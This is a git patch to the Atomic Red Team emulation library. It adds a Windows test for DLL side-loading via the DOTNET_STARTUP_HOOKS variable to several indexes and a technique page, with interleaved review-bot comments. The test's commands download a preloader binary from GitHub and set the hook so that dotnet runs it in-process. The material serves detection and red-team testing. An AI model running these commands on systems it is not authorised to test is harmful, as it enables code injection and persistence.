From 1bf4526ffd4020c230d91829bfdca9ec189b9d3b Mon Sep 17 00:00:00 2001
From: Atomic Red Team doc generator
Date: Wed, 17 Aug 2022 18:33:58 +0000
Subject: [PATCH] Generated docs from job=generate-docs branch=master [ci skip]
---
 atomics/Indexes/Indexes-CSV/index.csv | 3 +
 atomics/Indexes/Indexes-CSV/windows-index.csv | 3 +
 atomics/Indexes/Indexes-Markdown/index.md | 3 +
 .../Indexes/Indexes-Markdown/windows-index.md | 3 +
 atomics/Indexes/index.yaml | 147 ++++++++++++++++++
 atomics/T1574.002/T1574.002.md | 64 ++++++++
 6 files changed, 223 insertions(+)
diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index ec4d4ac4..15599860 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -398,6 +398,7 @@ defense-evasion,T1550.002,Pass the Hash,1,Mimikatz Pass the Hash,ec23cef9-27d9-4
 defense-evasion,T1550.002,Pass the Hash,2,crackmapexec Pass the Hash,eb05b028-16c8-4ad8-adea-6f5b219da9a9,command_prompt
 defense-evasion,T1550.002,Pass the Hash,3,Invoke-WMIExec Pass the Hash,f8757545-b00a-4e4e-8cfb-8cfb961ee713,powershell
 defense-evasion,T1574.002,DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GUP.exe binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt
+defense-evasion,T1574.002,DLL Side-Loading,2,DLL Side-Loading using the dotnet startup hook environment variable,d322cdd7-7d60-46e3-9111-648848da7c02,command_prompt
 defense-evasion,T1220,XSL Script Processing,1,MSXSL Bypass using local files,ca23bfb2-023f-49c5-8802-e66997de462d,command_prompt
 defense-evasion,T1220,XSL Script Processing,2,MSXSL Bypass using remote files,a7c3ab07-52fb-49c8-ab6d-e9c6d4a0a985,command_prompt
 defense-evasion,T1220,XSL Script Processing,3,WMIC bypass using local XSL file,1b237334-3e21-4a0c-8178-b8c996124988,command_prompt
@@ -564,6 +565,7 @@ privilege-escalation,T1543.002,Systemd Service,2,"Create Systemd Service file,
 privilege-escalation,T1547.007,Re-opened Applications,1,Re-Opened Applications,5fefd767-ef54-4ac6-84d3-751ab85e8aba,manual
 privilege-escalation,T1547.007,Re-opened Applications,2,Re-Opened Applications,5f5b71da-e03f-42e7-ac98-d63f9e0465cb,sh
 privilege-escalation,T1574.002,DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GUP.exe binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt
+privilege-escalation,T1574.002,DLL Side-Loading,2,DLL Side-Loading using the dotnet startup hook environment variable,d322cdd7-7d60-46e3-9111-648848da7c02,command_prompt
 privilege-escalation,T1037.001,Logon Script (Windows),1,Logon Scripts,d6042746-07d4-4c92-9ad8-e644c114a231,command_prompt
 privilege-escalation,T1078.004,Cloud Accounts,1,Creating GCP Service Account and Service Account Key,9fdd83fd-bd53-46e5-a716-9dec89c8ae8e,gcloud
 privilege-escalation,T1053.002,At,1,At.exe Scheduled task,4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8,command_prompt
@@ -795,6 +797,7 @@ persistence,T1543.002,Systemd Service,2,"Create Systemd Service file, Enable th
 persistence,T1547.007,Re-opened Applications,1,Re-Opened Applications,5fefd767-ef54-4ac6-84d3-751ab85e8aba,manual
 persistence,T1547.007,Re-opened Applications,2,Re-Opened Applications,5f5b71da-e03f-42e7-ac98-d63f9e0465cb,sh
 persistence,T1574.002,DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GUP.exe binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt
+persistence,T1574.002,DLL Side-Loading,2,DLL Side-Loading using the dotnet startup hook environment variable,d322cdd7-7d60-46e3-9111-648848da7c02,command_prompt
 persistence,T1037.001,Logon Script (Windows),1,Logon Scripts,d6042746-07d4-4c92-9ad8-e644c114a231,command_prompt
 persistence,T1137.002,Office Test,1,Office Application Startup Test Persistence,c3e35b58-fe1c-480b-b540-7600fb612563,command_prompt
 persistence,T1078.004,Cloud Accounts,1,Creating GCP Service Account and Service Account Key,9fdd83fd-bd53-46e5-a716-9dec89c8ae8e,gcloud
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv
index 36b761ae..5cae1b93 100644
--- a/atomics/Indexes/Indexes-CSV/windows-index.csv
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -291,6 +291,7 @@ defense-evasion,T1550.002,Pass the Hash,1,Mimikatz Pass the Hash,ec23cef9-27d9-4
 defense-evasion,T1550.002,Pass the Hash,2,crackmapexec Pass the Hash,eb05b028-16c8-4ad8-adea-6f5b219da9a9,command_prompt
 defense-evasion,T1550.002,Pass the Hash,3,Invoke-WMIExec Pass the Hash,f8757545-b00a-4e4e-8cfb-8cfb961ee713,powershell
 defense-evasion,T1574.002,DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GUP.exe binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt
+defense-evasion,T1574.002,DLL Side-Loading,2,DLL Side-Loading using the dotnet startup hook environment variable,d322cdd7-7d60-46e3-9111-648848da7c02,command_prompt
 defense-evasion,T1220,XSL Script Processing,1,MSXSL Bypass using local files,ca23bfb2-023f-49c5-8802-e66997de462d,command_prompt
 defense-evasion,T1220,XSL Script Processing,2,MSXSL Bypass using remote files,a7c3ab07-52fb-49c8-ab6d-e9c6d4a0a985,command_prompt
 defense-evasion,T1220,XSL Script Processing,3,WMIC bypass using local XSL file,1b237334-3e21-4a0c-8178-b8c996124988,command_prompt
@@ -411,6 +412,7 @@ privilege-escalation,T1574.009,Path Interception by Unquoted Path,1,Execution of
 privilege-escalation,T1546.010,AppInit DLLs,1,Install AppInit Shim,a58d9386-3080-4242-ab5f-454c16503d18,command_prompt
 privilege-escalation,T1546.002,Screensaver,1,Set Arbitrary Binary as Screensaver,281201e7-de41-4dc9-b73d-f288938cbb64,command_prompt
 privilege-escalation,T1574.002,DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GUP.exe binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt
+privilege-escalation,T1574.002,DLL Side-Loading,2,DLL Side-Loading using the dotnet startup hook environment variable,d322cdd7-7d60-46e3-9111-648848da7c02,command_prompt
 privilege-escalation,T1037.001,Logon Script (Windows),1,Logon Scripts,d6042746-07d4-4c92-9ad8-e644c114a231,command_prompt
 privilege-escalation,T1053.002,At,1,At.exe Scheduled task,4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8,command_prompt
 privilege-escalation,T1055.001,Dynamic-link Library Injection,1,Process Injection via mavinject.exe,74496461-11a1-4982-b439-4d87a550d254,powershell
@@ -574,6 +576,7 @@ persistence,T1197,BITS Jobs,4,Bits download using desktopimgdownldr.exe (cmd),af
 persistence,T1546.010,AppInit DLLs,1,Install AppInit Shim,a58d9386-3080-4242-ab5f-454c16503d18,command_prompt
 persistence,T1546.002,Screensaver,1,Set Arbitrary Binary as Screensaver,281201e7-de41-4dc9-b73d-f288938cbb64,command_prompt
 persistence,T1574.002,DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GUP.exe binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt
+persistence,T1574.002,DLL Side-Loading,2,DLL Side-Loading using the dotnet startup hook environment variable,d322cdd7-7d60-46e3-9111-648848da7c02,command_prompt
 persistence,T1037.001,Logon Script (Windows),1,Logon Scripts,d6042746-07d4-4c92-9ad8-e644c114a231,command_prompt
 persistence,T1137.002,Office Test,1,Office Application Startup Test Persistence,c3e35b58-fe1c-480b-b540-7600fb612563,command_prompt
 persistence,T1053.002,At,1,At.exe Scheduled task,4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8,command_prompt
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index 1efcb309..bb5053db 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -590,6 +590,7 @@ - Atomic Test #3: Invoke-WMIExec Pass the Hash [windows] - [T1574.002 DLL Side-Loading](../../T1574.002/T1574.002.md) - Atomic Test #1: DLL Side-Loading using the Notepad++ GUP.exe binary [windows] + - Atomic Test #2: DLL Side-Loading using the dotnet startup hook environment variable [windows] - T1126 Network Share Connection Removal [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1055.008 Ptrace System Calls [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1055.015 ListPlanting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -895,6 +896,7 @@ - Atomic Test #2: Re-Opened Applications [macos] - [T1574.002 DLL Side-Loading](../../T1574.002/T1574.002.md) - Atomic Test #1: DLL Side-Loading using the Notepad++ GUP.exe binary [windows] + - Atomic Test #2: DLL Side-Loading using the dotnet startup hook environment variable [windows] - T1160 Launch Daemon [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1055.008 Ptrace System Calls [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1037.001 Logon Script (Windows)](../../T1037.001/T1037.001.md) @@ -1347,6 +1349,7 @@ - Atomic Test #2: Re-Opened Applications [macos] - [T1574.002 DLL Side-Loading](../../T1574.002/T1574.002.md) - Atomic Test #1: DLL Side-Loading using the Notepad++ GUP.exe binary [windows] + - Atomic Test #2: DLL Side-Loading using the dotnet startup hook environment variable [windows] - T1098.002 Additional Email Delegate Permissions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1084 Windows Management Instrumentation Event Subscription [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1160 Launch Daemon [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index b5d40221..9001b9d0 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md 
@@ -440,6 +440,7 @@ - Atomic Test #3: Invoke-WMIExec Pass the Hash [windows] - [T1574.002 DLL Side-Loading](../../T1574.002/T1574.002.md) - Atomic Test #1: DLL Side-Loading using the Notepad++ GUP.exe binary [windows] + - Atomic Test #2: DLL Side-Loading using the dotnet startup hook environment variable [windows] - T1126 Network Share Connection Removal [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1055.015 ListPlanting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1484 Domain Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) @@ -658,6 +659,7 @@ - T1055.005 Thread Local Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1574.002 DLL Side-Loading](../../T1574.002/T1574.002.md) - Atomic Test #1: DLL Side-Loading using the Notepad++ GUP.exe binary [windows] + - Atomic Test #2: DLL Side-Loading using the dotnet startup hook environment variable [windows] - [T1037.001 Logon Script (Windows)](../../T1037.001/T1037.001.md) - Atomic Test #1: Logon Scripts [windows] - T1055.015 ListPlanting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) @@ -974,6 +976,7 @@ - T1136 Create Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1574.002 DLL Side-Loading](../../T1574.002/T1574.002.md) - Atomic Test #1: DLL Side-Loading using the Notepad++ GUP.exe binary [windows] + - Atomic Test #2: DLL Side-Loading using the dotnet startup hook environment variable [windows] - T1098.002 Additional Email Delegate Permissions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1084 Windows Management Instrumentation Event Subscription [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1037.001 Logon Script (Windows)](../../T1037.001/T1037.001.md) 
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 9a10c7a5..58f04b77 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml 
@@ -24249,6 +24249,55 @@ defense-evasion: command: "#{gup_executable}\n" cleanup_command: 'taskkill /F /IM #{process_name} >nul 2>&1 + ' + name: command_prompt + - name: DLL Side-Loading using the dotnet startup hook environment variable + auto_generated_guid: d322cdd7-7d60-46e3-9111-648848da7c02 + description: 'Utilizing the dotnet_startup_hooks environment variable, this + method allows for registering a global method in an assembly that will be + executed whenever a .net core application is started. This unlocks a whole + range of scenarios, from injecting a profiler to tweaking a static context + in a given environment. [blog post](https://medium.com/criteo-engineering/c-have-some-fun-with-net-core-startup-hooks-498b9ad001e1) + + ' + supported_platforms: + - windows + input_arguments: + process_name: + description: Name of the created process + type: String + default: calculator.exe + preloader_dll: + description: library for interfacing with the dotnet framework + type: Path + default: PathToAtomicsFolder\T1574.002\bin\preloader + dependency_executor_name: powershell + dependencies: + - description: ".Net SDK must be installed\n" + prereq_command: 'if (Test-Path "C:\Program Files\dotnet\dotnet.exe") {exit + 0} else {exit 1} + + ' + get_prereq_command: | + winget install Microsoft.DotNet.SDK.6 --accept-source-agreements --accept-package-agreements -h > $null + echo. + - description: 'preloader must exist + + ' + prereq_command: 'if (Test-Path "#{preloader_dll}") {exit 0} else {exit 1} + + ' + get_prereq_command: 'Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/bin/preloader?raw=true" + -OutFile "#{preloader_dll}" + + ' + executor: + command: | + set DOTNET_STARTUP_HOOKS=#{preloader_dll} + dotnet -h > nul + echo. + cleanup_command: 'taskkill /F /IM #{process_name} >nul 2>&1 + ' name: command_prompt T1126: 
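Review bot: The preloader prerequisite accepts any file at `#{preloader_dll}` — `prereq_command` is only a `Test-Path`, and `get_prereq_command` pulls the assembly from the mutable `blob/master/...?raw=true` URL — so the executor hands an unverified binary to `DOTNET_STARTUP_HOOKS` and `dotnet` runs it in-process with no integrity check. Pin the download to a commit SHA instead of `master` and compare a hash before treating the prerequisite as met, e.g. `if ((Test-Path "#{preloader_dll}") -and ((Get-FileHash "#{preloader_dll}" -Algorithm SHA256).Hash -eq "<sha256 of the committed preloader>")) {exit 0} else {exit 1}`. Since this index is generated (per the commit subject), the change belongs in the technique's source YAML and will flow here on the next generate-docs run.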
@@ -39454,6 +39503,55 @@ privilege-escalation: command: "#{gup_executable}\n" cleanup_command: 'taskkill /F /IM #{process_name} >nul 2>&1 + ' + name: command_prompt + - name: DLL Side-Loading using the dotnet startup hook environment variable + auto_generated_guid: d322cdd7-7d60-46e3-9111-648848da7c02 + description: 'Utilizing the dotnet_startup_hooks environment variable, this + method allows for registering a global method in an assembly that will be + executed whenever a .net core application is started. This unlocks a whole + range of scenarios, from injecting a profiler to tweaking a static context + in a given environment. [blog post](https://medium.com/criteo-engineering/c-have-some-fun-with-net-core-startup-hooks-498b9ad001e1) + + ' + supported_platforms: + - windows + input_arguments: + process_name: + description: Name of the created process + type: String + default: calculator.exe + preloader_dll: + description: library for interfacing with the dotnet framework + type: Path + default: PathToAtomicsFolder\T1574.002\bin\preloader + dependency_executor_name: powershell + dependencies: + - description: ".Net SDK must be installed\n" + prereq_command: 'if (Test-Path "C:\Program Files\dotnet\dotnet.exe") {exit + 0} else {exit 1} + + ' + get_prereq_command: | + winget install Microsoft.DotNet.SDK.6 --accept-source-agreements --accept-package-agreements -h > $null + echo. + - description: 'preloader must exist + + ' + prereq_command: 'if (Test-Path "#{preloader_dll}") {exit 0} else {exit 1} + + ' + get_prereq_command: 'Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/bin/preloader?raw=true" + -OutFile "#{preloader_dll}" + + ' + executor: + command: | + set DOTNET_STARTUP_HOOKS=#{preloader_dll} + dotnet -h > nul + echo. + cleanup_command: 'taskkill /F /IM #{process_name} >nul 2>&1 + ' name: command_prompt T1160: 
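Review bot: `cleanup_command` kills `#{process_name}` but never clears `DOTNET_STARTUP_HOOKS`, which the attack command sets with a plain `set` in the executor's shell; if the runner keeps that `command_prompt` session alive, every later `dotnet` call in it keeps loading the hook. Add `set DOTNET_STARTUP_HOOKS=` as the first cleanup line so the test leaves the session as it found it. The `calculator.exe` default for `process_name` implies the bundled hook spawns Calculator, but nothing in the test says so; if that is the intended proof of execution, state it in `description` (one sentence such as `The bundled preloader launches calculator.exe when the hook fires.`) so operators know what success looks like.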
@@ -61959,6 +62057,55 @@ persistence: command: "#{gup_executable}\n" cleanup_command: 'taskkill /F /IM #{process_name} >nul 2>&1 + ' + name: command_prompt + - name: DLL Side-Loading using the dotnet startup hook environment variable + auto_generated_guid: d322cdd7-7d60-46e3-9111-648848da7c02 + description: 'Utilizing the dotnet_startup_hooks environment variable, this + method allows for registering a global method in an assembly that will be + executed whenever a .net core application is started. This unlocks a whole + range of scenarios, from injecting a profiler to tweaking a static context + in a given environment. [blog post](https://medium.com/criteo-engineering/c-have-some-fun-with-net-core-startup-hooks-498b9ad001e1) + + ' + supported_platforms: + - windows + input_arguments: + process_name: + description: Name of the created process + type: String + default: calculator.exe + preloader_dll: + description: library for interfacing with the dotnet framework + type: Path + default: PathToAtomicsFolder\T1574.002\bin\preloader + dependency_executor_name: powershell + dependencies: + - description: ".Net SDK must be installed\n" + prereq_command: 'if (Test-Path "C:\Program Files\dotnet\dotnet.exe") {exit + 0} else {exit 1} + + ' + get_prereq_command: | + winget install Microsoft.DotNet.SDK.6 --accept-source-agreements --accept-package-agreements -h > $null + echo. + - description: 'preloader must exist + + ' + prereq_command: 'if (Test-Path "#{preloader_dll}") {exit 0} else {exit 1} + + ' + get_prereq_command: 'Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/bin/preloader?raw=true" + -OutFile "#{preloader_dll}" + + ' + executor: + command: | + set DOTNET_STARTUP_HOOKS=#{preloader_dll} + dotnet -h > nul + echo. + cleanup_command: 'taskkill /F /IM #{process_name} >nul 2>&1 + ' name: command_prompt T1098.002: diff --git a/atomics/T1574.002/T1574.002.md b/atomics/T1574.002/T1574.002.md index 62ab18dc..54fbbd32 100644 
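Review bot: The SDK prerequisite is checked at the hard-coded path `C:\Program Files\dotnet\dotnet.exe`, while the attack command runs whichever `dotnet` is first on `PATH`, so a per-user or x86 install can make the check and the execution disagree; `if (Get-Command dotnet -ErrorAction SilentlyContinue) {exit 0} else {exit 1}` tests what the executor actually uses. `get_prereq_command` also installs the .NET 6 SDK through `winget` with both agreement flags pre-accepted and nothing removes it afterwards — a host-modifying side effect worth a line in the description. The default `preloader_dll` has no `.dll` extension; `DOTNET_STARTUP_HOOKS` path entries are presumably loaded from the literal path given, so confirm the file downloaded under that name loads, or default to `PathToAtomicsFolder\T1574.002\bin\preloader.dll` and rename the artifact to match.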
--- a/atomics/T1574.002/T1574.002.md +++ b/atomics/T1574.002/T1574.002.md @@ -8,6 +8,8 @@ Side-loading takes advantage of the DLL search order used by the loader by posit - [Atomic Test #1 - DLL Side-Loading using the Notepad++ GUP.exe binary](#atomic-test-1---dll-side-loading-using-the-notepad-gupexe-binary) +- [Atomic Test #2 - DLL Side-Loading using the dotnet startup hook environment variable](#atomic-test-2---dll-side-loading-using-the-dotnet-startup-hook-environment-variable) +
@@ -60,4 +62,66 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/at +
+
+ +## Atomic Test #2 - DLL Side-Loading using the dotnet startup hook environment variable +Utilizing the dotnet_startup_hooks environment variable, this method allows for registering a global method in an assembly that will be executed whenever a .net core application is started. This unlocks a whole range of scenarios, from injecting a profiler to tweaking a static context in a given environment. [blog post](https://medium.com/criteo-engineering/c-have-some-fun-with-net-core-startup-hooks-498b9ad001e1) + +**Supported Platforms:** Windows + + +**auto_generated_guid:** d322cdd7-7d60-46e3-9111-648848da7c02 + + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| process_name | Name of the created process | String | calculator.exe| +| preloader_dll | library for interfacing with the dotnet framework | Path | PathToAtomicsFolder\T1574.002\bin\preloader| + + +#### Attack Commands: Run with `command_prompt`! + + +```cmd +set DOTNET_STARTUP_HOOKS=#{preloader_dll} +dotnet -h > nul +echo. +``` + +#### Cleanup Commands: +```cmd +taskkill /F /IM #{process_name} >nul 2>&1 +``` + + + +#### Dependencies: Run with `powershell`! +##### Description: .Net SDK must be installed +##### Check Prereq Commands: +```powershell +if (Test-Path "C:\Program Files\dotnet\dotnet.exe") {exit 0} else {exit 1} +``` +##### Get Prereq Commands: +```powershell +winget install Microsoft.DotNet.SDK.6 --accept-source-agreements --accept-package-agreements -h > $null +echo. +``` +##### Description: preloader must exist +##### Check Prereq Commands: +```powershell +if (Test-Path "#{preloader_dll}") {exit 0} else {exit 1} +``` +##### Get Prereq Commands: +```powershell +Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/bin/preloader?raw=true" -OutFile "#{preloader_dll}" +``` + + + +